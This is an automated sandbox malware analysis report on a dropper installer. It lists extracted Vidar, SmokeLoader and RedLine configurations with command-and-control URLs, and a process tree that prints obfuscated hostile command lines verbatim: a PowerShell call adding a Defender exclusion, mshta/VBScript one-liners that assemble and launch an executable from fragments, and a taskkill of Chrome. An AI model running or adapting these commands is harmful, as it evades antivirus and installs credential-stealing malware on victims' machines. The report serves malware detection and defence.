Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
08-10-2021 15:07
211008-shl8xsefa9 1008-10-2021 05:38
211008-gbvqyadce8 1007-10-2021 18:28
211007-w4jayacge3 10Analysis
-
max time kernel
17s -
max time network
76s -
platform
windows10_x64 -
resource
win10-de-20210920 -
submitted
07-10-2021 18:28
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
5.9MB
-
MD5
0308d3044eda0db671c58c2a97cb3c10
-
SHA1
1737ab616a61d35b0bde0aaad949d9894e14be9e
-
SHA256
b52242da50ea2b3a05f6787dfa7197a0c99442e91d3bc78b71363c2ff3c4f072
-
SHA512
29902fe4a53319290d18b65a6baa1d747f1389a84cd7eb1a123d05b418b737336cd54c84b76403bc2cbb1f078c19b4461a89eec8214bfcdcf4831bb1dbda0e3e
Malware Config
Extracted
vidar
41.2
916
https://mas.to/@serg4325
-
profile_id
916
Extracted
smokeloader
2020
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
Extracted
redline
media214
91.121.67.60:2151
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral8/memory/4688-290-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral8/memory/4688-291-0x000000000041B23A-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral8/files/0x000400000001ab81-154.dat family_socelars behavioral8/files/0x000400000001ab81-193.dat family_socelars -
Vidar Stealer 2 IoCs
resource yara_rule behavioral8/memory/2008-227-0x0000000004BA0000-0x0000000004C76000-memory.dmp family_vidar behavioral8/memory/2008-240-0x0000000000400000-0x0000000002E08000-memory.dmp family_vidar -
resource yara_rule behavioral8/files/0x000400000001ab75-123.dat aspack_v212_v242 behavioral8/files/0x000400000001ab75-124.dat aspack_v212_v242 behavioral8/files/0x000400000001ab76-122.dat aspack_v212_v242 behavioral8/files/0x000400000001ab76-125.dat aspack_v212_v242 behavioral8/files/0x000400000001ab78-131.dat aspack_v212_v242 behavioral8/files/0x000400000001ab78-128.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 14 IoCs
pid Process 768 setup_installer.exe 1584 setup_install.exe 1728 Thu16466b26f8b7.exe 396 Thu166f9a8bbe80.exe 2028 Thu164ba03be19.exe 1956 Thu161580bf75.exe 2008 Thu1628aafb3efd7c3d.exe 2824 Thu167d514d2a7ac5a.exe 2044 Thu16205451b994.exe 1004 Thu16f584bd3686.exe 1492 Thu165bd34b1e1d4d81.exe 3200 Thu1653d94a8da.exe 2252 Thu16f3de88a335950bb.exe 3660 Thu16f3de88a335950bb.tmp -
Loads dropped DLL 6 IoCs
pid Process 1584 setup_install.exe 1584 setup_install.exe 1584 setup_install.exe 1584 setup_install.exe 1584 setup_install.exe 1584 setup_install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 30 ip-api.com 41 ipinfo.io 42 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 4660 2044 WerFault.exe 95 5016 2044 WerFault.exe 95 4124 2044 WerFault.exe 95 -
Kills process with taskkill 2 IoCs
pid Process 4048 taskkill.exe 4320 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 35 IoCs
description pid Process Token: SeCreateTokenPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeAssignPrimaryTokenPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeLockMemoryPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeIncreaseQuotaPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeMachineAccountPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeTcbPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeSecurityPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeTakeOwnershipPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeLoadDriverPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeSystemProfilePrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeSystemtimePrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeProfSingleProcessPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeIncBasePriorityPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeCreatePagefilePrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeCreatePermanentPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeBackupPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeRestorePrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeShutdownPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeDebugPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeAuditPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeSystemEnvironmentPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeChangeNotifyPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeRemoteShutdownPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeUndockPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeSyncAgentPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeEnableDelegationPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeManageVolumePrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeImpersonatePrivilege 1492 Thu165bd34b1e1d4d81.exe Token: SeCreateGlobalPrivilege 1492 Thu165bd34b1e1d4d81.exe Token: 31 1492 Thu165bd34b1e1d4d81.exe Token: 32 1492 Thu165bd34b1e1d4d81.exe Token: 33 1492 Thu165bd34b1e1d4d81.exe Token: 34 1492 Thu165bd34b1e1d4d81.exe Token: 35 1492 Thu165bd34b1e1d4d81.exe Token: SeDebugPrivilege 1956 Thu161580bf75.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1980 wrote to memory of 768 1980 setup_x86_x64_install.exe 75 PID 1980 wrote to memory of 768 1980 setup_x86_x64_install.exe 75 PID 1980 wrote to memory of 768 1980 setup_x86_x64_install.exe 75 PID 768 wrote to memory of 1584 768 setup_installer.exe 76 PID 768 wrote to memory of 1584 768 setup_installer.exe 76 PID 768 wrote to memory of 1584 768 setup_installer.exe 76 PID 1584 wrote to memory of 812 1584 setup_install.exe 80 PID 1584 wrote to memory of 812 1584 setup_install.exe 80 PID 1584 wrote to memory of 812 1584 setup_install.exe 80 PID 1584 wrote to memory of 1588 1584 setup_install.exe 79 PID 1584 wrote to memory of 1588 1584 setup_install.exe 79 PID 1584 wrote to memory of 1588 1584 setup_install.exe 79 PID 1584 wrote to memory of 1236 1584 setup_install.exe 81 PID 1584 wrote to memory of 1236 1584 setup_install.exe 81 PID 1584 wrote to memory of 1236 1584 setup_install.exe 81 PID 1584 wrote to memory of 3000 1584 setup_install.exe 82 PID 1584 wrote to memory of 3000 1584 setup_install.exe 82 PID 1584 wrote to memory of 3000 1584 setup_install.exe 82 PID 1584 wrote to memory of 1064 1584 setup_install.exe 83 PID 1584 wrote to memory of 1064 1584 setup_install.exe 83 PID 1584 wrote to memory of 1064 1584 setup_install.exe 83 PID 1584 wrote to memory of 1208 1584 setup_install.exe 97 PID 1584 wrote to memory of 1208 1584 setup_install.exe 97 PID 1584 wrote to memory of 1208 1584 setup_install.exe 97 PID 1584 wrote to memory of 3444 1584 setup_install.exe 84 PID 1584 wrote to memory of 3444 1584 setup_install.exe 84 PID 1584 wrote to memory of 3444 1584 setup_install.exe 84 PID 1584 wrote to memory of 760 1584 setup_install.exe 85 PID 1584 wrote to memory of 760 1584 setup_install.exe 85 PID 1584 wrote to memory of 760 1584 setup_install.exe 85 PID 1584 wrote to memory of 4080 1584 setup_install.exe 86 PID 1584 wrote to memory of 4080 1584 setup_install.exe 86 PID 1584 wrote to memory of 4080 1584 setup_install.exe 86 PID 1584 wrote to memory of 1340 1584 setup_install.exe 87 PID 1584 wrote to memory of 1340 1584 setup_install.exe 87 PID 1584 wrote to memory of 1340 1584 setup_install.exe 87 PID 1584 wrote to memory of 1484 1584 setup_install.exe 88 PID 1584 wrote to memory of 1484 1584 setup_install.exe 88 PID 1584 wrote to memory of 1484 1584 setup_install.exe 88 PID 1584 wrote to memory of 1460 1584 setup_install.exe 89 PID 1584 wrote to memory of 1460 1584 setup_install.exe 89 PID 1584 wrote to memory of 1460 1584 setup_install.exe 89 PID 1588 wrote to memory of 396 1588 cmd.exe 90 PID 1588 wrote to memory of 396 1588 cmd.exe 90 PID 1588 wrote to memory of 396 1588 cmd.exe 90 PID 3444 wrote to memory of 1728 3444 cmd.exe 91 PID 3444 wrote to memory of 1728 3444 cmd.exe 91 PID 3444 wrote to memory of 1728 3444 cmd.exe 91 PID 1340 wrote to memory of 2028 1340 cmd.exe 92 PID 1340 wrote to memory of 2028 1340 cmd.exe 92 PID 1340 wrote to memory of 2028 1340 cmd.exe 92 PID 1064 wrote to memory of 2008 1064 cmd.exe 94 PID 1064 wrote to memory of 2008 1064 cmd.exe 94 PID 1064 wrote to memory of 2008 1064 cmd.exe 94 PID 3000 wrote to memory of 1956 3000 cmd.exe 93 PID 3000 wrote to memory of 1956 3000 cmd.exe 93 PID 1460 wrote to memory of 2824 1460 cmd.exe 96 PID 1460 wrote to memory of 2824 1460 cmd.exe 96 PID 1460 wrote to memory of 2824 1460 cmd.exe 96 PID 1236 wrote to memory of 2044 1236 cmd.exe 95 PID 1236 wrote to memory of 2044 1236 cmd.exe 95 PID 1236 wrote to memory of 2044 1236 cmd.exe 95 PID 1208 wrote to memory of 1492 1208 cmd.exe 103 PID 1208 wrote to memory of 1492 1208 cmd.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu166f9a8bbe80.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu166f9a8bbe80.exeThu166f9a8bbe80.exe5⤵
- Executes dropped EXE
PID:396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:812
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:436
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16205451b994.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu16205451b994.exeThu16205451b994.exe /mixone5⤵
- Executes dropped EXE
PID:2044 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 6566⤵
- Program crash
PID:4660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 6726⤵
- Program crash
PID:5016
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 7286⤵
- Program crash
PID:4124
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu161580bf75.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu161580bf75.exeThu161580bf75.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1628aafb3efd7c3d.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu1628aafb3efd7c3d.exeThu1628aafb3efd7c3d.exe5⤵
- Executes dropped EXE
PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16466b26f8b7.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu16466b26f8b7.exeThu16466b26f8b7.exe5⤵
- Executes dropped EXE
PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f584bd3686.exe4⤵PID:760
-
C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu16f584bd3686.exeThu16f584bd3686.exe5⤵
- Executes dropped EXE
PID:1004
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f3de88a335950bb.exe4⤵PID:4080
-
C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu16f3de88a335950bb.exeThu16f3de88a335950bb.exe5⤵
- Executes dropped EXE
PID:2252 -
C:\Users\Admin\AppData\Local\Temp\is-E8N51.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-E8N51.tmp\Thu16f3de88a335950bb.tmp" /SL5="$3012A,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu16f3de88a335950bb.exe"6⤵
- Executes dropped EXE
PID:3660 -
C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu16f3de88a335950bb.exe"C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu16f3de88a335950bb.exe" /SILENT7⤵PID:4068
-
C:\Users\Admin\AppData\Local\Temp\is-HS0MF.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-HS0MF.tmp\Thu16f3de88a335950bb.tmp" /SL5="$501F4,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu16f3de88a335950bb.exe" /SILENT8⤵PID:1096
-
C:\Users\Admin\AppData\Local\Temp\is-4TBBG.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-4TBBG.tmp\postback.exe" ss19⤵PID:4276
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss19⤵PID:4332
-
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart9⤵PID:4348
-
C:\033c60786a0c489c6d9db8ef\Setup.exeC:\033c60786a0c489c6d9db8ef\\Setup.exe /q /norestart /x86 /x64 /web10⤵PID:4616
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu164ba03be19.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu164ba03be19.exeThu164ba03be19.exe5⤵
- Executes dropped EXE
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu164ba03be19.exeC:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu164ba03be19.exe6⤵PID:1636
-
-
C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu164ba03be19.exeC:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu164ba03be19.exe6⤵PID:2640
-
-
C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu164ba03be19.exeC:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu164ba03be19.exe6⤵PID:4688
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1653d94a8da.exe4⤵PID:1484
-
C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu1653d94a8da.exeThu1653d94a8da.exe5⤵
- Executes dropped EXE
PID:3200 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu1653d94a8da.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu1653d94a8da.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵PID:3204
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu1653d94a8da.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu1653d94a8da.exe") do taskkill /F -Im "%~NxU"7⤵PID:2232
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵PID:3256
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵PID:2248
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"10⤵PID:4124
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )9⤵PID:4608
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵PID:4756
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵PID:4804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"11⤵PID:4820
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I11⤵PID:4844
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I12⤵PID:4900
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Thu1653d94a8da.exe"8⤵
- Kills process with taskkill
PID:4048
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu167d514d2a7ac5a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu167d514d2a7ac5a.exeThu167d514d2a7ac5a.exe5⤵
- Executes dropped EXE
PID:2824
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu165bd34b1e1d4d81.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu165bd34b1e1d4d81.exeThu165bd34b1e1d4d81.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1492 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:4228
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:4320
-
-
-
-
-
-